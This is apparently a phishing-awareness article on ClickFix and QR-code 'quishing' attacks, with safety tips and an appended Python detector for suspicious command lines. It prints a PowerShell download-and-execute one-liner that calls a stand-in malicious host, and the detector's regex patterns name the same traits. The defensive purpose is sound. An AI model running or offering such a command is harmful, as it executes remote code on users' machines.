Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access. Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans.
Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing.” Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised.
How to Stay Safe
With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:
- Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. Before acting, email the person or service directly to ask for confirmation, or use another trusted form of communication.
- Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example:
powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”
could be pasted and run in just three steps:
1. ⊞ +R
2. CTRL+V
3. Enter
- Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.
- Keep software and security tools updated to detect and block phishing attempts before they cause harm.
- Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams.
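For teams that review endpoint command-line logs, the following added example (not part of the original article) flags command lines that combine the traits of the ClickFix command quoted above: a built-in script host, an execution policy bypass, inline evaluation, and a remote download. The indicator patterns, the threshold, and all sample entries other than the article's own command are assumptions made for illustration.

```python
import re

# Curly quotes appear when a command is copied from a web page or e-mail.
_QUOTES = str.maketrans({"“": '"', "”": '"', "‘": "'", "’": "'"})

# Illustrative patterns (assumptions for this example, not a vendor rule set).
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|cmd)(\.exe)?\b", re.I),
    "policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass\b", re.I),
    "inline_eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I
    ),
    "url": re.compile(r"https?://", re.I),
}


def indicators(command: str) -> list[str]:
    """Return the names of all indicators found in one command line."""
    text = command.translate(_QUOTES)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(command: str) -> bool:
    """Flag a script host combined with at least two further indicators.

    The threshold is an assumption; tune it against your own baseline.
    """
    hits = indicators(command)
    return "script_host" in hits and len(hits) >= 3


# Constructed sample entries; the first is the command quoted in the article.
SAMPLES = [
    "powershell -exec bypass -c “IEX (New-Object Net.WebClient)"
    ".DownloadString(‘http://malicious.com/script.ps1’)”",
    "powershell -File C:\\Scripts\\backup.ps1",
    "cmd /c ipconfig /all",
    "https://intranet.example/portal",
]

if __name__ == "__main__":
    for entry in SAMPLES:
        verdict = "SUSPICIOUS" if is_suspicious(entry) else "ok"
        print(f"{verdict:10} {indicators(entry)} {entry[:60]}")
```

Routine administrative commands and plain URLs pass unflagged, so the check highlights only the combination of traits rather than any use of PowerShell or Command Prompt.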
By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions: Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you the time and stress of being a victim of a scam.